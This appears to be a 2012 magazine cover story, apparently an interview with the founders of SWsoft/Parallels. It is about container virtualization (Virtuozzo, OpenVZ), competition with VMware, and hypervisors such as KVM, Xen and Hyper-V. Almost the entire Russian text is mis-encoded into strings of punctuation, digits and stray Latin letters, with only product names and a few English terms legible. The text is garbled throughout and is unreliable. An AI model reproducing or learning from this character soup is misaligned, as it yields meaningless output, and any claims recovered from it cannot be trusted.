C-#1, "/'9)3-' &)$#9)20 30 10 -,4;& 2'$#.)-/#9, )7# (%>(# %1)8'-5 4(;-54; 4 .)4-0 — /0,8 & "0*+ 1+70$ '($8 #018>, - A$+ #0.802"+0 .040"%0, 50.00?-$8 $-: ,-)0:+ % "-,+)*+. @ $+1& 70 "-3-)8"(0 2-$.-$( ,+/+)8-"+ 2"-3%$0)8"(. G#)% 5.+0:$ & "-# "0 #)&3%)#> % 1( &/+)8">)% 30)+/0:-, A$+ '()- 5.+')01- "0 $+)8:+ ,)> "-#, "+ % ,)> "0*+.

H, 4 40.#7# (0&0$0 ",-0$'45 4#38090-5 R&D-2#.0(8%, 0 () «0%-4#/4'(7#9%? $092%», &-# #&)(5 "#.#7$# (0. 9 1%8%=).. @+*,- "0 '()+ 5.+0:$+/, 1( 5.%,&1(/-)% #+'#$/0"-"(0 — ,-/-C$0 5+5.+'&01 #,0)-$8 5.+,&:$. S "-# "%30*+ "0 5+)&3-)+#8, "+ 1( &3%)%#8, % &3%)%#8 "-4% );,%. B( /("&7,0"( '()% 5.+-,-/-$8 &#)&*% A$%? );,0C ,+.+*+, /0,8 & /#0? "%? '() 50.%+,, :+*,- +"% "0 ,0)-)% "%30*+, 3$+ 5.%"+#%)+ '( ,0"8*%.

6#780 9 1999 7#8% (0&0$ $#"0-54; "%3,/5 8#-2#.#9, (0< 0%-4#/4'(7#9,+ 1'3()4 -#>) "#-

&%94-9#90$ 4)1; ()90>(#. !",&#$.%> &#$.+0"- $-:, 3$+, :+*,- 5.%?+,%$#> A:+"+1%$8, / 50./&; +30.0,8 +$.02-;$ /"04"%? 5+,.>,3%:+/. S/+)%$8 30)+/0:- :&,- #)+7"00, 301 #:-2-$8 :+"$.-*0"$&: «!2/%"%$0, 1( /-# +30"8 );'%1, "+ & "-# #0C3-# "0$ /+21+7"+#$% # /-1% .-'+$-$8». @ $+1& 70, # $+3:% 2.0"%> 60"( "- "-4% &#)&*%, 1( "-?+,%)%#8 "- /0.?"01 &.+/"0.

EGQ<TU 9MV9I<G==TU EQMG@I D 1999 7#8% ., (03,90$'45 SWsoft, ' ASP Linux 1,$ (0<'. "/#)2-#.. B( :-: .-2 /(-'%.-)%, 301 2-"%1-$8#> ,-)840, - / %",&#$.%% / $+ /.01> '()+ ,/0 +#"+/"(? $01( ,)> +'-#&7,0"%>: /#0 *+/+.%)% +' application service 5.+/-C,0.-? (+ $+1, 3$+ #+D$ #:+.+ "-3"0$ 5.+,-/-$8#> :-: #0./%#) % + Linux — + $+1, 3$+ A$- #%#$01- «+$*.&2%$» Microsoft +30"8 '(#$.+. S "-# '() +5($ # UNIX, Linux, "-1 ?+$0)+#8 3$+-$+ #,0)-$8 / A$+1 "-5.-/)0"%%. E+A$+1& 1( 2--">)%#8 :+"$0C"0."+C /%.$&-)%2-6%0C, #$-)% .-2.-'-$(/-$8 % #/+C ,%#$.%'&$%/. E+#:+)8:& +" '() ,)> ASP (application service provider), +" 5+)&3%) $-:+0 "-2/-"%0.

A0.#) 90>(#) 9 $?1#. "/#8%2-) — #1I;4-('-5, &). '.)((# #( *#/#<. R$+*+ "0/+21+7"+ ,+'%$8#>, 2->/)>>: «B( $-:%0 70, :-: Red Hat, $+)8:+ )&340. W01 )&340? L- /#01». R$+ +30"8 5+5&)>."(C +$/0$, #0C3-# & #$-.$-5+/ 3-#$+ $--:+0 /#$.03-0$#>. «B( ,0)-01 Facebook "+/+*+ 5+:+)0"%>. J / 301 2-:);3-0$#> „"+/+0 5+:+-)0"%0“? L- /+ /#01». S );,0C "0$ +$/0$-. M"% #3%$-;$, 3$+ 1+*&$ 3$+-$+ #,0)-$8 — ,%#$.%-'&$%/ Linux %)% "+/(C Facebook, "+ ,+ :+"6- "0 5+"%1-;$, 301 %10""+ +" '&,0$ +$)%3-$8#> % :+1& /++'F0 "&70". 9 ASP Linux & "-# A$+ "0 #)%4:+1 ?+.+4+ 5+)&3%)+#8.

H, ",-0$'45 (0+-' "#3':'#('/#90(') 8$; ASP Linux, (# 8# 2#(:0 (0. E-# -02 ' () %80$#45. S Q+##%% $+*,- '()+ "0#:+)8:+ 5.0-$0",0"$+/ "- "-6%+"-)8"(C ,%#$.%'&$%/, / 3-#$"+#$% :+1-",- ALT Linux, ASP Linux. G#)% #1+$.0$8 "- +5($ @%$-> — +"% .04%)%, 3$+ Red Flag '&,0$ %? "-6%+"-)8"(1 ,%#$.%'&$%/+1, ,0C#$/%$0)8"+ 0*+ 5+,,0.7%/-)%, "+ ,-70 A$+ 5.-:$%30#:% "0 5+1+*)+.

COVERSTORY

029!"#$% 09 /164/ 2012

!"#$%&'( )* +#,"-).,&*/ 0%*#,)*&1/

!"#$%# $ %#" & Parallels '( Linux )( $*+ '(, )($%-%(./( &0#)*%#12/3# '(4*5** 6 %(", 2#* 3,),$#)4 )$%&$%"15 &$6$7. 8,9%-/$%, ",:- )9$;-,.-)#1 <2,)#&*&,.- & %,=%,>*#3$ 3*"#$7"$%"*7 #$5"*.*?-- &-%#<,.-=,;-- OpenVZ - $$ 9%*9%-$#,%"*?* &*9.*6$"-4 Parallels Virtuozzo Containers. @,)#' -A$7 3*"#$7"$%*& -)9*.'=<$# Google A.4 &-%#<,.--=,;-- )&*-5 BCD*&.

73 4-'*+*6-#" 6 "#8/$%,*" «9*/&:$-» 6$#, .%( *4 ;%(<( '(1&.*1($2, 6 .-$%/($%* :(/%#8/#,/&= %#+/(1(<*=. 0%*)#* *", 9$%$-)$3,$# /"*?* 9*A)-)#$/ 4A%, Linux, 9*E#*/< 9%*;$)) =,9-5-&,"-4 &$)'/, "$>1)#%17.

! ,-4/3# <()3 9*/&$ >(,6-12)$ * ),&<*# 1=)* <(6(,*1*, .%( (/* '(/*"-=% ',#*"&?#-$%6- :(/%#8/#,/(8 %#+/(1(<**, - *>6-7 3<%) #,3*&: Linux-4A%< "<F$" "$ #*.'3* hypervisor, %*.' 3*#*%*?* )$72,) -?%,$# 9%*$3# KVM, "* - 3*"#$7"$%"1$ #$5"*.*?--. 0*E#*/< /1 %,>*#,$/ - ) A%<?-/- ?%<99,/-, 3*#*%1$ =,-"-/,(#)4 9*5*F-/- 9%*>.$/,/-, - 9*#-5*"'3< «#*.3,$/».

@- $#<()/AB/*8 )#/2 0(12B# '(1(6*/3 ',*/A%( 6 mainstream kernel, "* E#* &*&)$ "$ =",2-#, 2#* &#*%<( 9*.*&-"< /1 A$%F-/ =, )9-"*7. C", #*F$ )&*>*A"* A*)#<9",, #*F$ 9*A .-;$"=-$7 GPL. G*.':$ 9*.*&-"1 ",:$?* 3*A, ",5*A-#)4 & .(>*/ 4A%$ Linux, 5*#' *# Red Hat, 5*#' ) kernel.org.

73 %(./( 4/-#", .%( Google )1A $6(#8 */C,-$%,&:%&,3 *$'(124&#% /-B& :(/%#8/#,-/&= %#+/(1(<*=, .-$%2 :(%(,(8 #$%2 6 A),#. H,3 3,3 9* sandbox’-"?< 9%*;$))*& -A$4 *2$"' 5*%*:,4 (9* *?%,"-2$"-( %$)<%)*&, 9* *?%,"--2$"-( #*?*, 2#* *"- /*?<# )A$.,#') — $$ /"*?* 3#* -)9*.'=<$#.

!I SWSOFT J PARALLELS ! 2004 <()& "3 :&'*1* /#0(12B(8 $%-,%-' Parallels, .%(03 )('(1/*%2 /-B& -6%("-%*-4-5*= * $#,6#,/&= 6*,%&-1*4-5*= *+ /-,--0(%:-"* '( )#$:%('-',()&:%&. J %$=<.'#,#$ >%$"A *3,=,.)4 ",)#*.'3* <=",&,$/1/, 2#* & ",2,.$ 2008 ?*A, SWsoft -=/$"-., ",=&,"-$ ", Parallels. 8,:-/ ,"?.*?*&*%46-/ 3.-$"-#,/ >1.* ).*F"* 9%*-="*)-#' «E)-A,>.-(-)*K#», A, - Parallels .<2:$ *#%,F,.* )<#' >-="$), — *A"*&%$/$"",4 %,>*#, "$)3*.'-3-5 C+.

D("'-/*A Parallels (6 %( 6,#"A #?# SWsoft) :-: 0*4/#$ /-.-1-$2 %(<)-, :(<)- ',(#:%3 :("'-/** HSP Complete ($*$%#"- -6%("-%*-4-5** )1A +($%*/<-',(6-8)#,(6) * Virtuozzo /-.-1* ',*/($*%2 )#/2<*. 0%,&A,, *2$"' "$->*.':-$. J 2000 ?*A< /1 *#3%1.- *K-) & LMH! & L*)3&$, <F$ 9*"-/,4, 2#* ",:, *K:*%",4 %,=%,>*#3, 9*A5*A-# 3 3*";<. N 9%-$5,. )(A,, /1 ,%$"A*&,.- 9*/$6$"-$ & 100 3&,A%,#"15 /$#%*&. 8,) >1.* :$)#' 2$.*&$3.

E(%(" /-.-1- '(/#"/(<& ,-$%* :("-/)-, &F# 031* '1-/3 '( :(/%#8/#,/(8 %#+/(1(<** 6*,%&-1*4-5**. OA$-#* 3 )$%$A-"$ -.- 3*";< ?*A, /1 9*"4.-, 2#* "$ &1F-&$/, $).- ><A$/ 9%*A*.F,#' %,>*#,#' ", A&$ )#%,"1. H*?A, /1 9%$A.*F-.- .(A4/, 3*#*%1$ %,>*#,.- & +-"?,9<%$, 9$%$$5,#' & L*)3&<. @,)#' )*?.,-

)-.,)', 2,)#' ",:., %,>*#< & P/$%-3$, 2,)#' *)#,.,)' & +-"?,9<%$.

! 2001 <()& "3 63'&$%*1* '#,638 (C*-5*-12/38 ,#1*4 /-B#<( ',()&:%- :(/%#8-/#,/(8 %#+/(1(<** Virtuozzo, )#,.- %,>*#,#' ) 5*)#-"?-9%*&,7A$%,/-, ",2,.- 9-),#' management tools. +#,.* 4)"*, 2#* 5*)#$%1 — E#* #$ .(A-, 3*#*%1/ ",:- 9%*A<3#1 /*?<# >1#' -"#$%$)"1.

G)/-:( 6'1(%2 )( 2003 <()- cash flow & /-$ ($%-6-1$A (%,*5-%#12/3", 5*#4 <F$ 9*4&--.-)' 9$%&1$ 3.-$"#1. Q#* >1.- *2$"' #4F$.1$ ?*A1, ).<2,.*)', =,A$%F-&,.- =,%9.,#<, 9.,#-.- .(A4/ "$ 9*."*)#'(.

E,#)$%-62%# $#0#: & 6-$ (0,-4(6-1*$2 :-:*#-%( )#/2<*, :(%(,3# 63 ,#B*1* '(%,--%*%2 /- $%-,%-'. R &,) $)#' "$9.*5,4 -A$4, A, - &1 &%*A$ >1 </"17 2$.*&$3. J,) &)$ ).<:,(#, 3-&,(#, "* "-3#* "$ ?*#*& %,=A$.-#' ) &,/- %-)3. J -#*?$ &1 9.,#-#$ =",2-/1$ A.4 &,) A$"'?- ()3,F$/, 100–200 #1)42 A*..,%*& & /$)4;), , A*-5*A %,)#$# "$)*9*)#,&-/* /$A.$""*, )*)#,&.44 /,-,.$"'3<( 2,)#' *# E#*7 )<//1. +*)#*4"-$ #,-3*$... D, 5*2$#)4 &)$ =,3%1#'! SA-")#&$""*$, 2#* <A$%F-&,$#, — 9*"-/,"-$, 2#* $).- =,3%*$:', #* <F$ #*2"* "-2$?* "$ &$%"$#)4.

H<,(4- %(<(, .%( "3 /# 63)#,F*", $1("-#"-$A * ',($%( 6$# 4-:,(#", 6 /-.-1# 2000-+ 6*$#1- /-) /-"* (.#/2 ,#-12/(. G1.* #4F$.*. T,=&--&,.-)' 3*"#$7"$%"1$ #$5"*.*?-- - 3*"#%*.'"1$ 9,"$.- &*3%<? "-5. H*?A, ) ",/- K,3#-2$)3- 3*"3<%-%*&,., 3*/9,"-4 Plesk, 9*5*F,4 ", ",) #$/, 2#* 9%*A,F- < "$$ >1.- =, %<>$F*/, , %,=%,>*#3, & T*))--, 3*"3%$#"$7 — & 8*&*)-->-%)3$. R "-5 "$ >1.* 3*"#$7"$%"15 #$5"*.*?-7, "* >1.- A*)#,#*2"* 9*9<.4%"1$ 3*"#%*.'"1$ 9,"$.-. R ",) 3*"#%*.'"1$ 9,"$.- #*F$ >1.-, "* 9.*5-$. L1 *>U$A-"-.-)' - 2$%$= 9*.?*A, &1:-.- ", <%*&$"' break even, 5*#4 A* *>U$A-"$"-4 *>$ 3*/9,"-- >1.- <>1#*2"1. + #$5 9*% *A-" -= ",:-5 ;$"#%*& %,=%,>*#3- ",5*A-#)4 & L*)3&$.

LS@HP +J!@STP I#$:%('-6*,%&-1*4-5*A /-.-1-$2 $ (.#/2 */-%#,#$/(8 *$%(,**. +<6$)#&*&,., "$=,&-)-/,4 3*/9,"-4, 3<A, & ",2,.$ 2000-5 *>%,#-.-)' "$/$;3-$ 9%$A9%-"-/,#$.-. C"- )3,=,.-, 2#* $)#' #,3,4 9%*>.$/,: 9*2#- &$)' )*K# A.4 >,"-3*/,#*& ",9-)," 9*A *9$%,;-*""<( )-)#$/< OS/2. 0%*>.$/, & #*/, 2#* IBM >*.':$ $$ "$ 9*AA$%F-&,$#, >%*)-., ", 9%*-=&*. )<A'>1, , ", "*&*$ F$.$=* OS/2 "$ &)#,$#. R >,"3*&, )#,.* >1#', $)#' A&, &15*A, — =,/$"4#' >,"3*/,#1 ", "*&1$ (2#* *2$"' A*%*?*) -.- /$"4#' 0C ", Windows NT (E#* #*F$ A*%*?*). 8* /*F"* 9*)#<9-#' -",2$ — ",9-),#' &-%#<,.'-

"<( /,:-"<, 3*#*%,4 ><A$# -=*>%,F,#' )#,%17 3*/9'(#$%. Q#< &-%#<,.'"<( /,:-"< /*F"* )#,&-#' ", Windows, , &"<#%- ><A$# OS/2, 3*#*-%,4 ><A$# A$%F,#' #*# F$ >,"3*&)3-7 )*K#. 8, E#*/, /*., /*F"* =,%,>*#,#' «#*""1 "$K#-».

73 /-B1* ;%& :("'-/*=. R ",) A,&"* )*-=%$., -A$4, 2#* SWsoft "$9.*5* >1.* >1 -/$#' )*>)#&$""17 ?-9$%&-=*%. J )<6"*)#-, 5*#$.- A*?*&*%-#')4 * #*/, 2#*>1 /1 -5 9*?.*#-.-. V.(2$&1$ .(A- -= E#*7 3*/,"A1 %,>*#,(# ) ",/- A* )-5 9*%, & 2,)#"*)#- — 8-3*.,7 D*>%*&*.')3-7.

D(<)- "3 6$%,#%*1*$2 $ D(1#8, (/ +(%#1 $ /-"* )(<(6-,*6-%2$A. C" 9*"-/,., 2#* /1 A,A-/ $/< "$ #*.'3* -"&$)#-%*&,"-$, 2#* /1 .<2:$ "$?* =",$/ %1"*3 - < ",) <F$ $)#', /*F$# >1#', "$ )*&$%:$""17, "* %,>*#,(6-7 /$5,"-=/ /,%3$#-"?, - 9%*A,F. 0*E#*/< /1 A*?*&*%-.-)' ", )9%,&$A.-&15 <).*&-45 - 9*?.*#-.- E#< 3*/,"A<.

@- Mac "3 %(<)- /# $"(%,#1*. L1 9%*)#* 9*?.*#-.- -5, "$ )*&)$/ 9*"-/,4, 3,3 -"#$-?%-%<$/ E#*# ?-9$%&-=*% «& )$>4». 0.,"*&, 3*"$2"*, >1.* /*%$, "* )",2,., /1 <:.- *# -A$- OS/2. G1.* 9*"4#"*, 2#* E#* «"$ &=.$#,-$#», 3 #*/< F$ >,"3- "$ /*?.- )-A$#' - FA,#', 3*?A, /1 9%-"$)$/ -/ %$:$"-$. C"- 9%*)#* ,9?%$7A-.- )&*- )-)#$/1, - OS/2 -)2$=,., )* );$"1.

D-:(#-%( 6,#"A "3 )#,F-1* :("-/)3 ,-4-)#12/(. G1.* "$ *2$"' 9*"4#"*, 3,3 -5 -"#$-?%-%*&,#', &$A' >-="$), )&4=,""17 ) %,=%,>*#-3*7 )*K#, A.4 )$%&-)-9%*&,7A$%*&, - >-="$) 9* %,=%,>*#3$ 0C A.4 A$)3#*9-&-%#<,.-=,;-- *2$"' %,="1$. J9%*2$/, < "-5 $)#' *>6-7 /*-/$"# — ?-9$%&-=*%, 3*#*%17 /1 -)9*.'=<$/ "$ #*.'3* & A$)3#*9"*/ 0C. J -#*?$ /1 &)$-#,3- )A$.,.- *A"< 3*/9,"-( — &%4A .- /1 )/*?.- >1 )*=A,#' A&$ -"F$"$%"1$ 3*/,"A1, )9*)*>-"1$ A$.,#' 5*%*:-$ 9%*A<3#1.

J#8.-$ & Parallels )6- ($/(6/3+0*4/#$- — A$)3#*9-&-%#<,.-=,;-4 - )*K# A.4 )$%&-)-9%*&,7A$%*&, 3*#*%17 9*=&*.4$# -/ 9%$A*)#,&.4#' /,.1/ >-="$),/ *>.,2"1$ <).<?-. «C>.,2",4» 2,)#' ",:$?* >-="$), %,)-#$# 2%$=&12,7"* >1)#%*.

«G01-./38» $(C% $($%(*% *4 )6&+ .-$%#8. 0$%&,4 — 9.,#K*%/,, 3*#*%,4 ",=1&,$#)4 POA (Parallels Operations Automation), *#&$2,$# =, *9%$A$.$"-$ )$%&-), (9*2#,, )*&/$)#",4 %,>*#,, 3*//<"-3,;-4), =, )3.$73< 3*/9*"$"-#*& & $A-"17 )$%&-) - A*)#,&3< - <)#,"*&3< &)$?* E#*?* ", )#*%*"< 3.-$"#,. J#*%,4 — E#* PBA (Parallels Business Automation) — >-..-"?, </$(6-7 %,>*#,#' ) )<6$)#&<(6-/- >-..-"?-)-)#$/,/-, & %,="15 )#%,",5 - #,3 A,.$$.

!"#$%& '$"$, ('$ )* +, -*.,#/0), 12$)&,)13 0 4#$1'$ -1, %&5#$,), - +&(&2, 2000-6 -01,2& +&. +&)0$(,+7 #,&27+$. 8*2$ '3/,2$.

!"#!$%&#'() * VMWARE !"#$ %& '()$*(+,+"- .$",&* /01$20%()$-+*, %(3$* +4$)",%+))&* (256*+),0* 764+, 82('( «9(,0 *& 4+3+%#+». + ,-. ./012 345657 8.9:;:7.

:0203$* 12$*+20* 7646, /$,(;"/$+ ,+#+-80)& Nokla. &34: 8.3<.-=0-2 15 1:>, -5< ?30 .-4:/1.: @?0 SIM-A5=-B, -040?:9.=, ;015 >.-=.C57 — 3000 =D640E, 1. 4F@: ?30 =5?1. >.-7- .645@5-2 Samsung : iPhone, 5 ?.?30 10 Nokla.

<)(.(#( % 4+"/,01-12046/,+ 104 Windows $ Linux *& %0 *)050* /01$20%(#$ ,0, .,0 4+#(#( VMware " ++ VMware Workstation. #. 8=.640<5 3 A.8:=.?51:0< 95A4F/50-37 ? -.<, /-. A.<851:7, A.-.=57 A.8:=D0-, — ?30G@5 @.G.170-. $ VMware 6B4. 6.42C0 @010G, D 1:> 6B45 42?:157 @.47 =B1A5, : 8.60@:-2 3 15-C:<: 3:45<: : =03D=35<: 15 ,-.< 8.40 6B4. 10?.9<.H1..

=0 ,6, Apple )+0>$4())0 07?@%$#( 0 1+2+A0-4+ )( 120B+""02& Intel; )(3( ,+A)0#05$@ ",(#( #+5/0 1+2+)0"$*( )( Mac OS. #5 =DAD 15< 3BG=5-4. : -., /-. VMware 6B45 6.42C.E A.<851:0E, 7 10 <.GD 3A595-2 «108.?.=.-4:?.E», 1....

Apple 7&#( "0%+23+))0 )+ $),+2+")( 70#-3$* $520/(* " 8$)()"0%0; ,0./$ '2+)$@. I0=?B0 .;01A: =B1A5, A.-.=B0 <B @0454:, 6B4: -5A.?B — 15?0=1.0, <.H1. 6D@0- 95-=56.-5-2 87-2 <:44:.1.? @.445=.? ? G.@. I=: .9?D/:?51:: ,-.E ;:J=B D ?30> 153 15/:15-4.32 108=.:9?.421.0 34F1..-@0401:0, 5 @47 VMware ,-. 6B4. ?..6K0 1: . /0<.

C0",(%/$ Mac 40 "$A 102 "0",(%#@D, )+ 70#++ 1(2& 4+"@,/0% 120B+),0% 0, %"+50 /0#$.+",%( )06,76/0% PC, )0 0)$ 101(4(D, / )6>)&* #D4@*. #58=:<0=, CEO Intel >.@:- 3 Mac. L. 03-2 -.8-<010@H<01- ./012 6B3-=. 8.4F6:4 :>. ( HD=154:3-B -.H0. M .6K0<, Mac 951:<50- 106.42CDF @.4F, 1. . 10< G.?.=7- -0 4F@:, A /20<D <101:F 8=:34DC:?5F-37.

VMware 54+-,0 .+2+' 504 '(*+,$#(, .,0 )(3 4+"/,01-12046/, A02030 1204(+,"@. ND<5F, .1: =0C:4: =59@5?:-2 153 /:3-. <0>51:/03A:. O-. 6B4. =59D<1B< =0C01:0< 3 :> 3-.=.1B — ?:=-D-54:95;:F .1: 8.1:<5F- @.?.421. >.=.C., .8B- D 1:> 6.42C.E, A.<851:7 3:42157, .1: .645@5F- .G=.<1B< .8B-.< ? -.<, A5A @045-2 8=5?:421BE 3.J-?0=1BE @0?04.8<01-.

VMware %&16",$#( Fusion, /0,02&; 12$-)@#"@ 0,>$2(,- )(3 2&)0/. M 80=?BE G.@ Fusion 80=0-71D4 A 3060 .A.4. 8.4.?:1B 15C:> A4:01-.?. #., ? .-4:/:0 .- Parallels, @47 VMware ,-.- 8=.0A- :<04 @540A. 10 80=?.3-08011DF 915/:<.3-2. "31.?1.0 @47 1:> — ,-. 30=?0=157 ?:=-D54:95;:7 @47 enterprise-A4:01-.?. + @47 153 Parallels Desktop 3-54 ./012 ?5H1.E /53-2F @.>.@5 8=5A-:/03A: 3 35<.G. 15/545, 8.,-.<D <B 3J.AD3:=.?54:32 15 0G. =59?:-::.

E>+ 54+-,0 .+2+' 504 *& 12$)@#$"- 10-)+*)056 0,?+4(,- 072(,)0 ,+A 10#-'0%(,+#+;, /0,02&A 10,+2@#$. #5 30G.@17 <B 951:<50< @.<:1:=DFKDF 8.9:;:F 15 =B1A0 @03A-.8-?:=-D54:95;::, >.-7 VMware DH0 80=08=.6.-?545 ?30 38.3.6B 6.=26B 3 15<:.

=( 120,@>+)$$ %"+A #+, B+)( )( 12046/, 7&#( 04$)(/0%0;, ( VMware 620)$#( "%0D B+)6 % 4%( 2('(. #. ,-. DH0 10 8.<.G54.. L.

03-2 ,A380=:<01-5421B< 8D-0< <B ?B731:-4: — 034: 3J.AD3:=.?5-237 : @.4G. 6:-2 ? 3-0-1D, ? .@1D -./AD, 3-01D ?30--5A: <.H1. 8=.6:-2.

I%"PQ"& ( R$N$S&& M(%L$+Q(T+'(( F")0%)(@ 1207#+*( %$2,6(#$'(B$$ — G,0 "/020",- 2(70,&. #03<.-=7 15 -. /-. <.K1.3-2 A.<82F-0=.? =53-0- 3 A5H@B< G.@.<, .1: ?30 =5?1. 1:A.G@5 10 6B?5F- @.3-5-./1. <.K1B<:.

H0%0#-)0 %(>)0; %+A0; 7&#0 ,0, .,0 VMware "*05#( 407$,-"@ #6.3+; 120$'-%04$,+#-)0",$ )( "+2%+2(A. *DK03-?D0- 10A:E 156.= :13-=DA;:E, A.-.=B0 G.3-0?57 "* 10 <.H0- ?B8.417-2 8=7<. 15 8=.;03-3.=0. &34: D ?53 03-2 :13-=DA;:7, A.-.=DF >./0- ?B8.41:-2 G.3-2, — 34.H:-2 =0G:3-= AX 3 =0G:3-=.< BX, 10- 8=.640<B, =59=0C:< 3@045-2 ,-. 15 8=.;033.=0. "@15A. :<00--37 10A:E .G=51:/011BE 156.= :13-=DA;:E, A.-.=BE <0170- =0H:< =56.-B 8=.;033.=5 (30G<01-1B0 =0G:3-=B 80=095G=DH5F-, 0K0 /-.--.). &34: 8.9?.4:-2 G.3-F :> @045-2, -. ?37 :9.47;:7 <0H@D G.3-0< : >.3-.< :3-/0950-. M 4D/C0< 34D/50 ,-. 8=:?.@:- A -.<D, /-. 10- 609.8531.3-:. #. -D- DH 6.G 6B 3 10E. M >D@C0< 34D/50 ?30 8=.3-. 85@50-, -5A A5A 8. :@00 G.3-0?57 .80=5;:.1157 3:3-0<5 10 @.4H15 915-2 1:/0G. . >.3-.?.E.

VMware 10",20$#( A02036D ,+A)0#05$D, /0,02(@ %"+ G,0 6.$,&%(+,. !=.<0 -.G., 03-2 0K0 .@:1 1F513. "6=56.-/:A 8=:?:40G:=.-?511B> :13-=DA;:E 10 @.4H01 951:<5-2 <1.G. -5A-.?, 8.-.<D /-. .1: @0E3-?:-0421. ?3-=0/5-F-37 /53-., .3.6011. ? 7@0=1.< A.1-0A3-0. L5A /-. 034: D 153 3-.:- .@1.-5A-157 :13-=DA;:7, 5 <B 95<0170< 15 .6=56.-/:A, A.-.=BE ?B-8.4170-37 ? 10 000 -5A-.?, <B -D- H0 8=.35H:-?50<37 8. 3A.=.3-:.

I VMware "0'4(#$ ,+A)0#05$D, /0,026D 0)$ )('&%(D, 4$)(*$.+"/0; $#$ 7$)(2)0;

,2()"#@B$+;. I=.3-. 60=D- A.@, :@D- 8. 10<D :, 034: 1DH1., =53C:=7F- in place. ! /0<D ,-. 8=:?.@:-? ! 8=:<0=D, D <017 9@032 3-.:- 10A:E jump ?.- 3F@5. ) =53C:=7F, 3..-?0-3-?011., <10 1DH1. 8=.58@0E-:-2 ,-.- jump, /-.6B .1 8.A59B?54 ? 1DH1.0 <03-..

J4+-,0 / 2005 5046 0)$ "4+#(#$ G,0 ,(/ A02030, .,0 *05 7& 5024$,-"@ #D70; $)>+)+2. N.3-5-./1. 3A595-2, /-., A.G@5 Intel ??04 3?.: 5885=5-1B0 :13-=DA;::, 8.4D/:4.32 -5A, /-. D VMware 3A.=.3-2 @:15<:/03A.E -=51347;:: 6B45 8=:<0=1. .@:15A.?5 3. 3A.=.3-2F 5885-=5-1.G. Intel.

K& ,0>+ " G,$* 7020#$"- " 10*0L-D /0)-,+;)+20%, $, 46*(D, "+;.(" *& )+ "$#-)0 0,-",(+* 0, VMware % G,0* %0120"+. (915/5421. 15C 8.@>.@ 6B4 8.>.H 15 =0C01:0 Connectix. UB 159B?54: 0G. smart kernel optimization — 10<1.G. 8=.K0, /0< D VMware, 1. >.=.C. =56.-54, @5?54 8.>.HDF 8=.:9?.@:-0421.3-2. &@:13-?011BE 0G. 10@.3-5-.A — 95A45@B?5-4.32 9151:0 . -.<, /-. ,-. :<011. -5 G.3-0?57 "*, 5 10 @=DG57. M 95?:3:<.3-: .- A.1A=0-1.E G.3-0?.E "*, 85--0=1 ?3-=0/: ,-:> 8=:?:40G:-=.?511B> :13-=DA;:E <.H0- <017-237.

H6*(D, )$/(/$A 0"07+))&A 0,/2&,$; % G,0; 07#(",$ % 7#$>(;3+* 7646L+* )+ 120$'0;4+,. %05421. 8=.=B?1B< 3 5885=5--1.E -./A: 9=01:7 : 3 -./A: 9=01:7 8.@@0=HA: ?:=-D54:95;:: 3.J-.< 6B45 108.3=0@3-?011. -0>1.4.G:7 VTX. "3-5421B0 ?0K:, /-. .1: ?B8D3-:4:, — VTD, VTC : 8=./00 7?47F-37 8.-3-D85-0421B<: C5G5<:.

=( "+504)@ %$2,6(#$'(B$@ ",(#( 07&.-)&* 2+"62"0*. $ Microsoft 03-2 Hyper-V. &3-2 VMware 3 0G. ESX. $ >.3-0=.? ?B6.= 0K0 C:=0: KVM, Xen, Hyper-V, ESX, Virtuozzo, 15C Parallels Cloud Server — /-. >./0C2, -. : :38.429DE. M:=-D54:95;:7 6D@0- ?30G@5 : ?09@0. M A5H@.E "*, 15 A5H@.< D3-=.E3-?0, ?0@2 ,-. D@.61. 3 <1.G:> -./0A 9=01:7.

COVERSTORY

!"#$% 09 /164/ 2012030

031!"#$% 09 /164/ 2012

!"#$%&'( )* +#,"-).,&*/ 0%*#,)*&1/

!"# $%&" '() %(*+,&? 2,34/$$#)5, Hyper-V "-647, "$ 487$#. 9,6 /-"-/4/, & :.-;,8<-$ "$)6*.'6* 7$)5#6*& .$# "-647, "$ -)=$3"$# ESX, >*#*/4 6,6 ?#* @->$%&-3*% "*/$% *7-" ", enterprise-%1"6$. 9*"$="*, KVM :47$# %,)#- — *" >%*)#*8, A*%*<* - 6*/>,6#"* )7$.,". B@* .(:5# Linux kernel-.(7-, - ?#* .-<' &*>%*) &%$/$"-, >%$;7$ =$/ *" :47$# & 6,;7*/ 7-)-#%-:4#-&$ Linux. Xen #*;$ "$ >%*>,7$#, "*, /"$ 6,;$#)5, $@* 7*.5 :47$# >,7,#'. 0%-=-", >%*)#, — &$"7*%1 7-)#%-:4#-&*& /$"'<$ &"-/,"-5 47$.5(# Xen. C"- "$ #* =#*:1 >%$7->*=-#,(# KVM, >%*)#* Xen ).*;"$$.

D ).*;"1A &$E$8 $)#' &*3/*;"*)#' &*8#- & 6,;718 7-)#%-:4#-&, $).- *"- &A*75# & vanilla kernel. F* =#*:1 >*8#- & vanilla kernel, *" 7*.;$" -"#$@%-%*&,#')5, 7,:1 $@* 7,.'"$8-<,5 >*77$%;6, #$A"*.*@-- &-%#4,.-3,G-- "$ >%$7)#,&.5., ).*;"*)#-. H-="* 4 /$"5 ).*;--.*)' &>$=,#.$"-$ (&*3/*;"*, *<-:*="*$), =#* Xen -"#$@%-%4$#)5 "$ ).-<6*/ A*%*<*.

-&*("+ ).#/ .01"2(*03(40/ )&5#%'6 7#52" "#*+8# #9&'+ #".($':& */%0. F$ >%$7-)#,&.5(, =#* "4;"* )*#&*%-#', =#*:1 ",8#- #,/ 6,64(-#* "*&4( "-<4. I>%*=$/, Ni)ira, 6*#*%4( "$7,&"* 64>-., VMware, 7$.,., &-%#4,.-3,G-( )$#-. J*%*<-8 >%-/$% — .(7- ",<.- "-<4, & 6*#*%*8 "-6#* "$ -@%,..

;#'&9'#, 7: 3'(&7 <1# OpenFlow, %($& '(=*/%(&7 3( '070, >"# 8($&")6 '(7 0'"&1&)-':7, '# *09'# 6 '& 3'(/, 9"# 03 >"#5# 7#$&" <#*290"+)6. K7$)' &$7' *=$"' &,;$" &*>%*) L*64),. I$=",5 >%*:.$/, — "$ A&,#,$# &%$/$"- - )-., L*64)-%*&,#')5 "4;"* ", =$/-#* *7"*/. J*#5 )$#$&,5 &-%#4,.-3,G-5 /*;$# :1#' *=$"' -"#$%$)"*8 #$/*8, 5 "$ :474 3,@,71&,#'.

